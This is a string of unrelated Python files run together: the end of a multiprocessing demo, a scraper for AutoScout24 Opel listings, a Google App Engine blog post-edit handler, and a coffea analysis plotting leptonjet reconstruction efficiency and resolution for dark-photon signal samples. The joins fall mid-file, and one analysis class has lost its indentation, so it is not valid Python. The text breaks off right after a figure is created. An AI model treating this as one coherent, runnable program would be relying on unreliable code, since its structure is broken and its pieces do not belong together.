    ]
    for p in process:
        p.start()
    for p in process:
        p.join()
    print("All Thread end!%s" % ctime())


if __name__ == '__main__':
    # Process creation now happens only under the __main__ guard: with the
    # spawn start method (Windows/macOS) children re-import this module, and
    # module-level Process objects would be re-created in every child.
    _run_demo()
from bs4 import BeautifulSoup as bs
from requests import Session

headers = {'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0'}
# url = 'https://www.autoscout24.com/lst/?sort=standard&desc=0&fuel=3&ustate=N%2CU&size=20&page={}&atype=C&'
url = 'https://www.autoscout24.com/lst/opel?sort=standard&desc=0&offer=S&ustate=N%2CU&size=20&page={}&atype=C&'


def scrape(pages=20, outfile='opel.txt'):
    """Collect AutoScout24 Opel listing links from the first *pages* result
    pages and write one detail-page URL per line to *outfile*.

    Parameterizes the previously hard-coded page count and output path;
    defaults reproduce the original behaviour.
    """
    s = Session()
    # `with` guarantees the output file is closed (the original leaked it)
    with open(outfile, mode='w', encoding='utf-8') as f:
        for i in range(1, pages + 1):
            m_url = url.format(i)
            r = s.get(m_url, headers=headers)
            soup = bs(r.content, 'html.parser')
            for j in soup.find_all('div', 'cldt-summary-titles'):
                aa = j.find('a')
                f.write('https://www.autoscout24.com' + aa.get('href') + '?cldtidx=1&cldtsrc=listPage' + '\n')
            # progress indicator
            print(m_url)


if __name__ == '__main__':
    scrape()
from bloghandler import BlogHandler
from models.user import User
from models.post import Post
from helper import *
from google.appengine.ext import db
class EditPost(BlogHandler):
    """Handler for editing an existing blog post (author only)."""

    def get(self):
        # Only logged-in users may see the edit form.
        if self.user:
            self.render("editpost.html")
        else:
            self.redirect("/login")
            return

    def post(self):
        if not self.user:
            self.redirect('/blog')
            return
        author = self.get_user_name()
        post_id = self.request.get('post_id')
        # Validate before converting: the original called int(post_id)
        # first, so a missing/empty id raised ValueError instead of
        # hitting this redirect (the guard was effectively dead).
        if not post_id:
            self.redirect('/blog/newpost')
            return
        post = self.find_post_from_db(int(post_id))
        if not post:
            self.error(404)
            return
        if post.author != author:
            msg = "Oops, you are not the author of this post"
            self.render('login-form.html', error=msg)
            return
        subject = self.request.get('subject')
        content = self.request.get('content')
        if subject and content:
            post.subject = subject
            post.content = content
            post.put()
            self.redirect('/blog/%s' % str(post.key().id()))
            return
        else:
            # re-render the form with an error if either field is missing
            error = "subject and content, please!"
            self.render("editpost.html", subject=subject,
                        content=content, error=error)
            return
|
#!/usr/bin/env python
"""For AN
leptonjets efficiencies and resolutions
"""
import argparse
import awkward
import coffea.processor as processor
import numpy as np
import matplotlib.pyplot as plt
from coffea import hist
from coffea.analysis_objects import JaggedCandidateArray
from FireHydrant.Analysis.DatasetMapLoader import (DatasetMapLoader,
SigDatasetMapLoader)
from FireHydrant.Tools.correction import (get_nlo_weight_function,
get_pu_weights_function,
get_ttbar_weight)
from FireHydrant.Tools.metfilter import MetFilters
from FireHydrant.Tools.trigger import Triggers
# Silence numpy warnings from divide-by-zero/overflow in efficiency ratios.
np.seterr(divide='ignore', invalid='ignore', over='ignore')
plt.rcParams["savefig.dpi"] = 120
plt.rcParams["savefig.bbox"] = "tight"
parser = argparse.ArgumentParser(description="[AN] leptonjet efficiencies/resolutions")
parser.add_argument("--sync", action='store_true', help="issue rsync command to sync plots folder to lxplus web server")
# NOTE(review): arguments are parsed at import time; importing this module
# from elsewhere would consume sys.argv.
args = parser.parse_args()
# dml = DatasetMapLoader()
# bkgDS, bkgMAP, bkgSCALE = dml.fetch('bkg')
# dataDS, dataMAP = dml.fetch('data')
# Signal dataset maps/scales for the two channels used below.
sdml = SigDatasetMapLoader()
sigDS_2mu2e, sigSCALE_2mu2e = sdml.fetch('2mu2e')
sigDS_4mu, sigSCALE_4mu = sdml.fetch('4mu')
class MuEffiResoProcessor(processor.ProcessorABC):
def __init__(self):
dataset_axis = hist.Cat('dataset', 'dataset')
lxy_axis = hist.Bin('lxy', 'lxy [cm]', 100, 0, 700)
reso_axis = hist.Bin('reso', '($p_T$(reco)-$p_T$(gen))/$p_T$(gen)', 100, -1, 2)
reco_axis = hist.Cat('reco', 'reco type')
self._accumulator = processor.dict_accumulator({
'lxy': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
'lxy-pf': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
'lxy-dsa': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
'reso': hist.Hist('Norm. Frequency/0.03', dataset_axis, reso_axis, reco_axis),
})
@property
def accumulator(self):
return self._accumulator
def process(self, df):
output = self.accumulator.identity()
dataset = df['dataset']
genparticles = JaggedCandidateArray.candidatesfromcounts(
df['gen_p4'],
px=df['gen_p4.fCoordinates.fX'].content,
py=df['gen_p4.fCoordinates.fY'].content,
pz=df['gen_p4.fCoordinates.fZ'].content,
energy=df['gen_p4.fCoordinates.fT'].content,
pid=df['gen_pid'].content,
vx=df['gen_vtx.fCoordinates.fX'].content,
vy=df['gen_vtx.fCoordinates.fY'].content,
vz=df['gen_vtx.fCoordinates.fZ'].content,
charge=df['gen_charge'].content,
)
genparticles.add_attributes(rho=np.hypot(genparticles.vx, genparticles.vy))
genmuons = genparticles[(np.abs(genparticles.pid)==13)&(genparticles.pt>10)&(np.abs(genparticles.eta)<2.4)&(genparticles.rho<700)]
## at least 2 good gen muons
nmuGe2 = genmuons.counts>=2
genmuons = genmuons[nmuGe2]
ljsources = JaggedCandidateArray.candidatesfromcounts(
df['ljsource_p4'],
px=df['ljsource_p4.fCoordinates.fX'].content,
py=df['ljsource_p4.fCoordinates.fY'].content,
pz=df['ljsource_p4.fCoordinates.fZ'].content,
energy=df['ljsource_p4.fCoordinates.fT'].content,
pid=df['ljsource_type'].content,
charge=df['ljsource_charge'].content,
)
muons = ljsources[(ljsources.pid==3)|(ljsources.pid==8)][nmuGe2]
matchidx = genmuons.argmatch(muons, deltaRCut=0.3)
genmuons_ = genmuons[muons.counts!=0]
sameq = (muons[matchidx][muons.counts!=0].charge==genmuons_.charge)&(matchidx[muons.counts!=0]!=-1)
output['lxy'].fill(dataset=dataset, lxy=genmuons_[sameq].rho.flatten(), reco='true')
output['lxy'].fill(dataset=dataset, lxy=genmuons.rho.flatten(), reco='inclusive')
genpt = genmuons_[sameq].pt.flatten()
recopt = muons[matchidx][muons.counts!=0][sameq].pt.flatten()
output['reso'].fill(dataset=dataset, reso=(recopt-genpt)/genpt, reco='(PFMu+DSAMu)')
muons = ljsources[(ljsources.pid==3)][nmuGe2]
matchidx = genmuons.argmatch(muons, deltaRCut=0.3)
genmuons_ = genmuons[muons.counts!=0]
sameq = (muons[matchidx][muons.counts!=0].charge==genmuons_.charge)&(matchidx[muons.counts!=0]!=-1)
output['lxy-pf'].fill(dataset=dataset, lxy=genmuons_[sameq].rho.flatten(), reco='true')
output['lxy-pf'].fill(dataset=dataset, lxy=genmuons.rho.flatten(), reco='inclusive')
genpt = genmuons_[sameq].pt.flatten()
recopt = muons[matchidx][muons.counts!=0][sameq].pt.flatten()
output['reso'].fill(dataset=dataset, reso=(recopt-genpt)/genpt, reco='PFMu')
muons = ljsources[(ljsources.pid==8)][nmuGe2]
matchidx = genmuons.argmatch(muons, deltaRCut=0.3)
genmuons_ = genmuons[muons.counts!=0]
sameq = (muons[matchidx][muons.counts!=0].charge==genmuons_.charge)&(matchidx[muons.counts!=0]!=-1)
output['lxy-dsa'].fill(dataset=dataset, lxy=genmuons_[sameq].rho.flatten(), reco='true')
output['lxy-dsa'].fill(dataset=dataset, lxy=genmuons.rho.flatten(), reco='inclusive')
genpt = genmuons_[sameq].pt.flatten()
recopt = muons[matchidx][muons.counts!=0][sameq].pt.flatten()
output['reso'].fill(dataset=dataset, reso=(recopt-genpt)/genpt, reco='DSAMu')
return output
def postprocess(self, accumulator):
    """Coffea hook run after all chunks are merged; the accumulated
    histograms need no further transformation, so pass them through."""
    return accumulator
class MuLJEffiResoProcessor(processor.ProcessorABC):
    """Reconstruction efficiency (vs gen decay length lxy) and pT resolution
    of mu-type leptonjets matched to gen darkphotons decaying to muon pairs.
    """

    def __init__(self):
        # Histogram axes: dataset category, transverse decay length,
        # relative pT resolution, and the reco category being filled.
        dataset_axis = hist.Cat('dataset', 'dataset')
        lxy_axis = hist.Bin('lxy', 'lxy [cm]', 100, 0, 700)
        reso_axis = hist.Bin('reso', '($p_T$(reco)-$p_T$(gen))/$p_T$(gen)', 100, -1, 2)
        reco_axis = hist.Cat('reco', 'reco type')
        self._accumulator = processor.dict_accumulator({
            'lxy': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
            'lxy-pf': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
            'lxy-dsa': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
            'reso': hist.Hist('Norm. Frequency/0.03', dataset_axis, reso_axis, reco_axis),
        })

    @property
    def accumulator(self):
        # Template accumulator cloned per chunk by the coffea executor.
        return self._accumulator

    def process(self, df):
        output = self.accumulator.identity()
        dataset = df['dataset']
        # Gen particles with the daughters' production-vertex coordinates.
        genparticles = JaggedCandidateArray.candidatesfromcounts(
            df['gen_p4'],
            px=df['gen_p4.fCoordinates.fX'].content,
            py=df['gen_p4.fCoordinates.fY'].content,
            pz=df['gen_p4.fCoordinates.fZ'].content,
            energy=df['gen_p4.fCoordinates.fT'].content,
            pid=df['gen_pid'].content,
            daupid=df['gen_daupid'].content,
            dauvx=df['gen_dauvtx.fCoordinates.fX'].content,
            dauvy=df['gen_dauvtx.fCoordinates.fY'].content,
            dauvz=df['gen_dauvtx.fCoordinates.fZ'].content,
        )
        # Transverse displacement of the daughter vertex (the decay lxy).
        genparticles.add_attributes(daurho=np.hypot(genparticles.dauvx, genparticles.dauvy))
        # Darkphoton (pid 32) with muon daughters (pid 13), in acceptance:
        # lxy < 700 cm, pT > 20 GeV, |eta| < 2.4.
        is_dpToMu = (genparticles.pid==32)&(genparticles.daupid==13)
        dpMu = genparticles[is_dpToMu&(genparticles.daurho<700)&(genparticles.pt>20)&(np.abs(genparticles.eta)<2.4)]
        # at least 1 good dpMu
        nDpMuGe1 = dpMu.counts>=1
        dpMu = dpMu[nDpMuGe1]
        leptonjets = JaggedCandidateArray.candidatesfromcounts(
            df['pfjet_p4'],
            px=df['pfjet_p4.fCoordinates.fX'].content,
            py=df['pfjet_p4.fCoordinates.fY'].content,
            pz=df['pfjet_p4.fCoordinates.fZ'].content,
            energy=df['pfjet_p4.fCoordinates.fT'].content,
        )
        # Classify leptonjets by constituent types (PF cand type codes:
        # 3 = PF muon, 8 = DSA muon): label 1 = egamma, 2 = pure PFMu,
        # 3 = contains at least one DSA muon.
        ljdautype = awkward.fromiter(df['pfjet_pfcand_type'])
        npfmu = (ljdautype==3).sum()
        ndsa = (ljdautype==8).sum()
        isegammajet = (npfmu==0)&(ndsa==0)
        ispfmujet = (npfmu>=2)&(ndsa==0)
        isdsajet = ndsa>0
        label = isegammajet.astype(int)*1+ispfmujet.astype(int)*2+isdsajet.astype(int)*3
        leptonjets.add_attributes(label=label)
        nmu = ((ljdautype==3)|(ljdautype==8)).sum()
        leptonjets.add_attributes(ismutype=(nmu>=2), iseltype=(nmu==0))
        # Keep only charge-neutral leptonjets (mu-type must have qsum == 0).
        ljdaucharge = awkward.fromiter(df['pfjet_pfcand_charge']).sum()
        leptonjets.add_attributes(qsum=ljdaucharge)
        leptonjets.add_attributes(isneutral=(leptonjets.iseltype | (leptonjets.ismutype&(leptonjets.qsum==0))))
        leptonjets = leptonjets[leptonjets.isneutral]
        leptonjets = leptonjets[nDpMuGe1]
        # --- all mu-type leptonjets (PFMu + DSAMu) ---
        ljmu = leptonjets[leptonjets.ismutype]
        matchidx = dpMu.argmatch(ljmu, deltaRCut=0.4)
        dpMu_ = dpMu[ljmu.counts!=0]
        matchmask = matchidx[ljmu.counts!=0]!=-1
        output['lxy'].fill(dataset=dataset, lxy=dpMu_[matchmask].daurho.flatten(), reco='true')
        output['lxy'].fill(dataset=dataset, lxy=dpMu.daurho.flatten(), reco='inclusive')
        genpt = dpMu_[matchmask].pt.flatten()
        recopt = ljmu[matchidx][ljmu.counts!=0][matchmask].pt.flatten()
        output['reso'].fill(dataset=dataset, reso=(recopt-genpt)/genpt, reco='(PFMu+DSAMu)-type leptonjet')
        # --- pure PFMu leptonjets (label 2) ---
        ljmu = leptonjets[leptonjets.label==2]
        matchidx = dpMu.argmatch(ljmu, deltaRCut=0.4)
        dpMu_ = dpMu[ljmu.counts!=0]
        matchmask = matchidx[ljmu.counts!=0]!=-1
        genpt = dpMu_[matchmask].pt.flatten()
        recopt = ljmu[matchidx][ljmu.counts!=0][matchmask].pt.flatten()
        output['reso'].fill(dataset=dataset, reso=(recopt-genpt)/genpt, reco='PFMu-type leptonjet')
        output['lxy-pf'].fill(dataset=dataset, lxy=dpMu_[matchmask].daurho.flatten(), reco='true')
        output['lxy-pf'].fill(dataset=dataset, lxy=dpMu.daurho.flatten(), reco='inclusive')
        # --- DSA-containing leptonjets (label 3) ---
        ljmu = leptonjets[leptonjets.label==3]
        matchidx = dpMu.argmatch(ljmu, deltaRCut=0.4)
        dpMu_ = dpMu[ljmu.counts!=0]
        matchmask = matchidx[ljmu.counts!=0]!=-1
        genpt = dpMu_[matchmask].pt.flatten()
        recopt = ljmu[matchidx][ljmu.counts!=0][matchmask].pt.flatten()
        output['reso'].fill(dataset=dataset, reso=(recopt-genpt)/genpt, reco='DSAMu-type leptonjet')
        output['lxy-dsa'].fill(dataset=dataset, lxy=dpMu_[matchmask].daurho.flatten(), reco='true')
        output['lxy-dsa'].fill(dataset=dataset, lxy=dpMu.daurho.flatten(), reco='inclusive')
        return output

    def postprocess(self, accumulator):
        # Histograms merge additively; nothing further to do.
        return accumulator
class EGMEffiProcessor(processor.ProcessorABC):
    """Reconstruction efficiency (vs gen vertex lxy) of leptonjet egamma
    source candidates (pid 2 = PFElectron, pid 4 = PFPhoton) matched to
    gen electrons."""

    def __init__(self):
        dataset_axis = hist.Cat('dataset', 'dataset')
        lxy_axis = hist.Bin('lxy', 'lxy [cm]', 100, 0, 250)
        reco_axis = hist.Cat('reco', 'reco type')
        self._accumulator = processor.dict_accumulator({
            'lxy': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
            'lxy-el': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
            'lxy-pho': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
        })

    @property
    def accumulator(self):
        # Template accumulator cloned per chunk by the coffea executor.
        return self._accumulator

    def process(self, df):
        output = self.accumulator.identity()
        dataset = df['dataset']
        genparticles = JaggedCandidateArray.candidatesfromcounts(
            df['gen_p4'],
            px=df['gen_p4.fCoordinates.fX'].content,
            py=df['gen_p4.fCoordinates.fY'].content,
            pz=df['gen_p4.fCoordinates.fZ'].content,
            energy=df['gen_p4.fCoordinates.fT'].content,
            pid=df['gen_pid'].content,
            vx=df['gen_vtx.fCoordinates.fX'].content,
            vy=df['gen_vtx.fCoordinates.fY'].content,
            vz=df['gen_vtx.fCoordinates.fZ'].content,
            charge=df['gen_charge'].content,
        )
        # Transverse displacement of the gen production vertex.
        genparticles.add_attributes(rho=np.hypot(genparticles.vx, genparticles.vy))
        # Gen electrons in acceptance: pT > 10 GeV, |eta| < 2.4, vxy < 250 cm.
        genel = genparticles[(np.abs(genparticles.pid)==11)&(genparticles.pt>10)&(np.abs(genparticles.eta)<2.4)&(genparticles.rho<250)]
        ## at least 2 good gen electrons
        nelGe2 = genel.counts>=2
        genel = genel[nelGe2]
        ljsources = JaggedCandidateArray.candidatesfromcounts(
            df['ljsource_p4'],
            px=df['ljsource_p4.fCoordinates.fX'].content,
            py=df['ljsource_p4.fCoordinates.fY'].content,
            pz=df['ljsource_p4.fCoordinates.fZ'].content,
            energy=df['ljsource_p4.fCoordinates.fT'].content,
            pid=df['ljsource_type'].content,
            charge=df['ljsource_charge'].content,
        )
        # --- PFElectron + PFPhoton combined ---
        egms = ljsources[(ljsources.pid==2)|(ljsources.pid==4)][nelGe2]
        matchidx = genel.argmatch(egms, deltaRCut=0.3)
        genel_ = genel[egms.counts!=0]
        matchmask = matchidx[egms.counts!=0]!=-1
        output['lxy'].fill(dataset=dataset, lxy=genel_[matchmask].rho.flatten(), reco='true')
        output['lxy'].fill(dataset=dataset, lxy=genel.rho.flatten(), reco='inclusive')
        # --- PFElectron only (pid 2) ---
        egms = ljsources[(ljsources.pid==2)][nelGe2]
        matchidx = genel.argmatch(egms, deltaRCut=0.3)
        genel_ = genel[egms.counts!=0]
        matchmask = matchidx[egms.counts!=0]!=-1
        output['lxy-el'].fill(dataset=dataset, lxy=genel_[matchmask].rho.flatten(), reco='true')
        output['lxy-el'].fill(dataset=dataset, lxy=genel.rho.flatten(), reco='inclusive')
        # --- PFPhoton only (pid 4) ---
        egms = ljsources[(ljsources.pid==4)][nelGe2]
        matchidx = genel.argmatch(egms, deltaRCut=0.3)
        genel_ = genel[egms.counts!=0]
        matchmask = matchidx[egms.counts!=0]!=-1
        output['lxy-pho'].fill(dataset=dataset, lxy=genel_[matchmask].rho.flatten(), reco='true')
        output['lxy-pho'].fill(dataset=dataset, lxy=genel.rho.flatten(), reco='inclusive')
        return output

    def postprocess(self, accumulator):
        # Histograms merge additively; nothing further to do.
        return accumulator
class EGMLJEffiResoProcessor(processor.ProcessorABC):
    """Reconstruction efficiency (vs gen decay length lxy) and pT resolution
    of EGM-type leptonjets matched to gen darkphotons decaying to electron
    pairs."""

    def __init__(self):
        dataset_axis = hist.Cat('dataset', 'dataset')
        lxy_axis = hist.Bin('lxy', 'lxy [cm]', 100, 0, 250)
        reso_axis = hist.Bin('reso', '($p_T$(reco)-$p_T$(gen))/$p_T$(gen)', 100, -0.5, 0.5)
        reco_axis = hist.Cat('reco', 'reco type')
        self._accumulator = processor.dict_accumulator({
            'lxy': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
            'lxy-el': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
            'lxy-pho': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
            'reso': hist.Hist('Norm. Frequency/0.01', dataset_axis, reso_axis, reco_axis),
        })

    @property
    def accumulator(self):
        # Template accumulator cloned per chunk by the coffea executor.
        return self._accumulator

    def process(self, df):
        output = self.accumulator.identity()
        dataset = df['dataset']
        genparticles = JaggedCandidateArray.candidatesfromcounts(
            df['gen_p4'],
            px=df['gen_p4.fCoordinates.fX'].content,
            py=df['gen_p4.fCoordinates.fY'].content,
            pz=df['gen_p4.fCoordinates.fZ'].content,
            energy=df['gen_p4.fCoordinates.fT'].content,
            pid=df['gen_pid'].content,
            daupid=df['gen_daupid'].content,
            dauvx=df['gen_dauvtx.fCoordinates.fX'].content,
            dauvy=df['gen_dauvtx.fCoordinates.fY'].content,
            dauvz=df['gen_dauvtx.fCoordinates.fZ'].content,
        )
        # Transverse displacement of the daughter vertex (the decay lxy).
        genparticles.add_attributes(daurho=np.hypot(genparticles.dauvx, genparticles.dauvy))
        # Darkphoton (pid 32) with electron daughters (pid 11), in acceptance:
        # lxy < 250 cm, pT > 20 GeV, |eta| < 2.4.
        is_dpToEl = (genparticles.pid==32)&(genparticles.daupid==11)
        dpEl = genparticles[is_dpToEl&(genparticles.daurho<250)&(genparticles.pt>20)&(np.abs(genparticles.eta)<2.4)]
        # at least 1 good dpEl
        nDpElGe1 = dpEl.counts>=1
        dpEl = dpEl[nDpElGe1]
        leptonjets = JaggedCandidateArray.candidatesfromcounts(
            df['pfjet_p4'],
            px=df['pfjet_p4.fCoordinates.fX'].content,
            py=df['pfjet_p4.fCoordinates.fY'].content,
            pz=df['pfjet_p4.fCoordinates.fZ'].content,
            energy=df['pfjet_p4.fCoordinates.fT'].content,
        )
        # Classify leptonjets by constituents (type codes: 2 = PF electron,
        # 3 = PF muon, 8 = DSA muon). Labels are additive: an egamma jet
        # containing an electron gets 1 + 4 = 5; a pure-photon egamma jet
        # stays at 1.
        ljdautype = awkward.fromiter(df['pfjet_pfcand_type'])
        nel = (ljdautype==2).sum()
        npfmu = (ljdautype==3).sum()
        ndsa = (ljdautype==8).sum()
        isegammajet = (npfmu==0)&(ndsa==0)
        iseljet = (isegammajet)&(nel!=0)
        ispfmujet = (npfmu>=2)&(ndsa==0)
        isdsajet = ndsa>0
        label = isegammajet.astype(int)*1+ispfmujet.astype(int)*2+isdsajet.astype(int)*3+iseljet.astype(int)*4
        leptonjets.add_attributes(label=label)
        nmu = ((ljdautype==3)|(ljdautype==8)).sum()
        leptonjets.add_attributes(ismutype=(nmu>=2), iseltype=(nmu==0))
        # Keep only charge-neutral leptonjets (mu-type must have qsum == 0).
        ljdaucharge = awkward.fromiter(df['pfjet_pfcand_charge']).sum()
        leptonjets.add_attributes(qsum=ljdaucharge)
        leptonjets.add_attributes(isneutral=(leptonjets.iseltype | (leptonjets.ismutype&(leptonjets.qsum==0))))
        leptonjets = leptonjets[leptonjets.isneutral]
        leptonjets = leptonjets[nDpElGe1]
        # --- all EGM-type leptonjets ---
        ljegm = leptonjets[leptonjets.iseltype]
        matchidx = dpEl.argmatch(ljegm, deltaRCut=0.4)
        dpEl_ = dpEl[ljegm.counts!=0]
        matchmask = matchidx[ljegm.counts!=0]!=-1
        output['lxy'].fill(dataset=dataset, lxy=dpEl_[matchmask].daurho.flatten(), reco='true')
        output['lxy'].fill(dataset=dataset, lxy=dpEl.daurho.flatten(), reco='inclusive')
        genpt = dpEl_[matchmask].pt.flatten()
        recopt = ljegm[matchidx][ljegm.counts!=0][matchmask].pt.flatten()
        output['reso'].fill(dataset=dataset, reso=(recopt-genpt)/genpt, reco='EGM-type leptonjet')
        # --- electron-containing egamma jets (label 5) ---
        ljegm = leptonjets[leptonjets.label==5]
        matchidx = dpEl.argmatch(ljegm, deltaRCut=0.4)
        dpEl_ = dpEl[ljegm.counts!=0]
        matchmask = matchidx[ljegm.counts!=0]!=-1
        genpt = dpEl_[matchmask].pt.flatten()
        recopt = ljegm[matchidx][ljegm.counts!=0][matchmask].pt.flatten()
        output['reso'].fill(dataset=dataset, reso=(recopt-genpt)/genpt, reco='Electron-type leptonjet')
        output['lxy-el'].fill(dataset=dataset, lxy=dpEl_[matchmask].daurho.flatten(), reco='true')
        output['lxy-el'].fill(dataset=dataset, lxy=dpEl.daurho.flatten(), reco='inclusive')
        # --- photon-only egamma jets (label 1) ---
        ljegm = leptonjets[leptonjets.label==1]
        matchidx = dpEl.argmatch(ljegm, deltaRCut=0.4)
        dpEl_ = dpEl[ljegm.counts!=0]
        matchmask = matchidx[ljegm.counts!=0]!=-1
        genpt = dpEl_[matchmask].pt.flatten()
        recopt = ljegm[matchidx][ljegm.counts!=0][matchmask].pt.flatten()
        output['reso'].fill(dataset=dataset, reso=(recopt-genpt)/genpt, reco='Photon-type leptonjet')
        output['lxy-pho'].fill(dataset=dataset, lxy=dpEl_[matchmask].daurho.flatten(), reco='true')
        output['lxy-pho'].fill(dataset=dataset, lxy=dpEl.daurho.flatten(), reco='inclusive')
        return output

    def postprocess(self, accumulator):
        # Histograms merge additively; nothing further to do.
        return accumulator
if __name__ == "__main__":
    import os
    from os.path import join, isdir, splitext

    # Images go to $FH_BASE/Imgs/<path derived from this module's filename>.
    reldir = splitext(__file__)[0].replace('_', '/')
    outdir = join(os.getenv('FH_BASE'), "Imgs", reldir)
    if not isdir(outdir): os.makedirs(outdir)

    import re
    # Select only the long-lifetime (lxy-300) signal samples for the plots.
    longdecay = re.compile('^.*_lxy-300$')

    # FIX applied throughout this block: LaTeX backslashes in ax.text strings
    # are doubled (\\geqslant, \\eta, \\Delta) so they are no longer invalid
    # "\g"/"\e"/"\D" escape sequences (a SyntaxWarning slated to become an
    # error). The produced strings are byte-identical; "\n" stays a newline.

    # ----------------------------------------------------------
    ## mu cand efficiency, resolution
    output = processor.run_uproot_job(sigDS_2mu2e,
                                      treename='ffNtuplizer/ffNtuple',
                                      processor_instance=MuEffiResoProcessor(),
                                      executor=processor.futures_executor,
                                      executor_args=dict(workers=12, flatten=False),
                                      chunksize=500000,
                                      )

    fig, ax = plt.subplots(figsize=(8,6))
    hist.plotratio(num=output['lxy'][longdecay].sum('dataset').integrate('reco', 'true'),
                   denom=output['lxy'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
                   overflow='over',
                   error_opts={'marker': 'o',},
                   ax=ax,
                   label='PFMu+DSAMu')
    hist.plotratio(num=output['lxy-pf'][longdecay].sum('dataset').integrate('reco', 'true'),
                   denom=output['lxy-pf'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
                   overflow='over',
                   error_opts={'marker': 'o', 'color': 'tab:red', 'fillstyle': 'none',},
                   ax=ax,
                   clear=False,
                   label='PFMu')
    hist.plotratio(num=output['lxy-dsa'][longdecay].sum('dataset').integrate('reco', 'true'),
                   denom=output['lxy-dsa'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
                   overflow='over',
                   error_opts={'marker': 'o', 'color': 'tab:green', 'fillstyle': 'none',},
                   ax=ax,
                   clear=False,
                   label='DSAMu')
    ax.set_ylim([0, 1.05])
    ax.set_yticks(np.arange(0, 1.05, 0.1))
    ax.set_xticks(np.arange(0, 701, 50))
    ax.grid(axis='y', ls='--')
    ax.legend()
    ax.set_title('[signalMC|2mu2e] leptonjet source - muon candidates (PFMuon+DSAMu) \nreconstruction efficiency vs. gen muon lxy', x=0.0, ha="left")
    ax.set_xlabel(ax.get_xlabel(), x=1.0, ha="right")
    ax.set_ylabel('Efficiency/7', y=1.0, ha="right")
    ax.text( 0.6, 0.6, '$\\geqslant$2 gen muons with\n$p_T>10GeV, |\\eta|<2.4, vxy<700cm$\n$\\Delta R$(gen,reco)<0.3, same charge', transform=ax.transAxes)
    fig.savefig(join(outdir, 'mucand-effi-vs-lxy_2mu2e.png'))
    fig.savefig(join(outdir, 'mucand-effi-vs-lxy_2mu2e.pdf'))
    plt.close(fig)

    fig, ax = plt.subplots(figsize=(8,6))
    hist.plot1d(output['reso'][longdecay].sum('dataset'), overlay='reco', ax=ax, overflow='all', density=True)
    ax.set_title('[signalMC|2mu2e] leptonjet source - muon candidates (PFMuon+DSAMu)\n$p_T$ resolution', x=0, ha='left')
    ax.set_xlabel(ax.get_xlabel(), x=1.0, ha="right")
    ax.set_ylabel(ax.get_ylabel(), y=1.0, ha="right")
    ax.set_xticks(np.arange(-1, 2.01, 0.2))
    fig.savefig(join(outdir, 'mucand-ptreso_2mu2e.png'))
    fig.savefig(join(outdir, 'mucand-ptreso_2mu2e.pdf'))
    plt.close(fig)

    # ----------------------------------------------------------
    ## mu-type leptonjet efficiency, resolution
    output = processor.run_uproot_job(sigDS_2mu2e,
                                      treename='ffNtuplizer/ffNtuple',
                                      processor_instance=MuLJEffiResoProcessor(),
                                      executor=processor.futures_executor,
                                      executor_args=dict(workers=12, flatten=False),
                                      chunksize=500000,
                                      )

    fig, ax = plt.subplots(figsize=(8,6))
    hist.plotratio(num=output['lxy'][longdecay].sum('dataset').integrate('reco', 'true'),
                   denom=output['lxy'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
                   overflow='over',
                   error_opts={'marker': 'o',},
                   ax=ax,
                   label='(PFMu+DSAMu)-type leptonjet')
    hist.plotratio(num=output['lxy-pf'][longdecay].sum('dataset').integrate('reco', 'true'),
                   denom=output['lxy-pf'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
                   overflow='over',
                   error_opts={'marker': 'o', 'color': 'tab:red', 'fillstyle': 'none',},
                   ax=ax,
                   clear=False,
                   label='PFMu-type leptonjet')
    hist.plotratio(num=output['lxy-dsa'][longdecay].sum('dataset').integrate('reco', 'true'),
                   denom=output['lxy-dsa'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
                   overflow='over',
                   error_opts={'marker': 'o', 'color': 'tab:green', 'fillstyle': 'none',},
                   ax=ax,
                   clear=False,
                   label='DSAMu-type leptonjet')
    ax.set_ylim([0, 1.05])
    ax.set_yticks(np.arange(0, 1.05, 0.1))
    ax.set_xticks(np.arange(0, 701, 50))
    ax.grid(axis='y', ls='--')
    ax.legend()
    ax.set_title('[signalMC|2mu2e] mu-type leptonjet\nreconstruction efficiency vs. gen muon lxy', x=0.0, ha="left")
    ax.set_xlabel(ax.get_xlabel(), x=1.0, ha="right")
    ax.set_ylabel('Efficiency/7', y=1.0, ha="right")
    ax.text( 0.6, 0.6, '$\\geqslant$1 gen darkphoton(${}$) with\n$p_T>20GeV, |\\eta|<2.4, lxy<700cm$\n$\\Delta R$(gen,reco)<0.4'.format(r'\rightarrow\mu^+\mu^-'), transform=ax.transAxes)
    fig.savefig(join(outdir, 'mulj-effi-vs-lxy_2mu2e.png'))
    fig.savefig(join(outdir, 'mulj-effi-vs-lxy_2mu2e.pdf'))
    plt.close(fig)

    fig, ax = plt.subplots(figsize=(8,6))
    hist.plot1d(output['reso'][longdecay].sum('dataset'), overlay='reco', ax=ax, overflow='all', density=True)
    ax.set_title('[signalMC|2mu2e] mu-type leptonjet $p_T$ resolution', x=0, ha='left')
    ax.set_xlabel(ax.get_xlabel(), x=1.0, ha="right")
    ax.set_ylabel(ax.get_ylabel(), y=1.0, ha="right")
    ax.set_xticks(np.arange(-1, 2.01, 0.2))
    fig.savefig(join(outdir, 'mulj-ptreso_2mu2e.png'))
    fig.savefig(join(outdir, 'mulj-ptreso_2mu2e.pdf'))
    plt.close(fig)

    # ----------------------------------------------------------
    ## EGM cand efficiency
    output = processor.run_uproot_job(sigDS_2mu2e,
                                      treename='ffNtuplizer/ffNtuple',
                                      processor_instance=EGMEffiProcessor(),
                                      executor=processor.futures_executor,
                                      executor_args=dict(workers=12, flatten=False),
                                      chunksize=500000,
                                      )

    fig, ax = plt.subplots(figsize=(8,6))
